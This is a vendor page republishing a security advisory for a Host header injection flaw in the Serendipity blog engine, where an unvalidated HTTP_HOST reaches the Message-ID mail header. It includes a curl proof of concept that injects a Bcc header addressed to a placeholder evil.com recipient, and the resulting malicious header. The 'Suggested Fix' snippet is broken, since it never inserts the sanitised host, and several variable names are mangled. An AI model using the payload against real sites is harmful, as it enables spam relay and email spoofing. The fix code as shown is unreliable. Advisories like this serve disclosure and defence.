Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2026-39971

Serendipity has a Host Header Injection allows SMTP header injection via unvalidated HTTP_HOST in Message-ID email header
Back to all
CVE

CVE-2026-39971

Serendipity has a Host Header Injection allows SMTP header injection via unvalidated HTTP_HOST in Message-ID email header

Summary

Serendipity inserts $SERVER['HTTPHOST'] directly into the Message-ID SMTP header without any validation beyond CRLF stripping. An attacker who can control the Host header during an email-triggering action can inject arbitrary SMTP headers into outgoing emails, enabling spam relay, BCC injection, and email spoofing.

Details

In include/functions.inc.php:548:

$maildata['headers'][] = 'Message-ID: <' 
    . bin2hex(random_bytes(16)) 
    . '@' . $_SERVER['HTTP_HOST']  // ← unsanitized, attacker-controlled
    . '>';

The existing sanitization function only blocks \r\n and URL-encoded variants:

function serendipity_isResponseClean($d) {
    return (strpos($d, "\r") === false && strpos($d, "\n") === false 
        && stripos($d, "%0A") === false && stripos($d, "%0D") === false);
}

Critically, serendipity_isResponseClean() is not even called on HTTP_HOST before embedding it into the mail headers — making this exploitable with any character that SMTP interprets as a header delimiter.

Email is triggered by actions such as:

  • New comment notifications to blog owner
  • Comment subscription notifications to subscribers
  • Password reset emails (if configured)

PoC

## Trigger comment notification email with injected header
curl -s -X POST \
  -H "Host: attacker.com>\r\nBcc: victim@evil.com\r\nX-Injected:" \
  -d "serendipity[comment]=test&serendipity[name]=hacker&serendipity[email]=a@b.com&serendipity[entry_id]=1" \
  http://[TARGET]/comment.php

Resulting malicious Message-ID header in outgoing email:

Message-ID: <deadbeef@attacker.com>
Bcc: victim@evil.com
X-Injected: >

Impact

An attacker can control the domain portion of the Message-ID header in all outgoing emails sent by Serendipity (comment notifications, subscriptions). 

This enables:

  • Identity spoofing — emails appear to originate from attacker-controlled domain
  • Reply hijacking — some mail clients use Message-ID for threading, pointing replies toward attacker infrastructure
  • Email reputation abuse — attacker's domain embedded in legitimate mail headers

Suggested Fix

Sanitize HTTP_HOST before embedding in mail headers, and restrict to valid hostname characters only:

$safe_host = preg_replace('/[^a-zA-Z0-9.\-]/', '', 
    parse_url('http://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST)
);
$maildata['headers'][] = 'Message-ID: ';

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
7.2
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
C
H
U
-

Related Resources

No items found.

References

https://github.com/s9y/Serendipity/security/advisories/GHSA-458g-q4fh-mj6r, https://nvd.nist.gov/vuln/detail/CVE-2026-39971, https://github.com/s9y/Serendipity, https://github.com/s9y/Serendipity/releases/tag/2.6.0

Severity

7.2

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
7.2
EPSS Probability
0.00064%
EPSS Percentile
0.20224%
Introduced Version
0
Fix Available
2.6.0

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading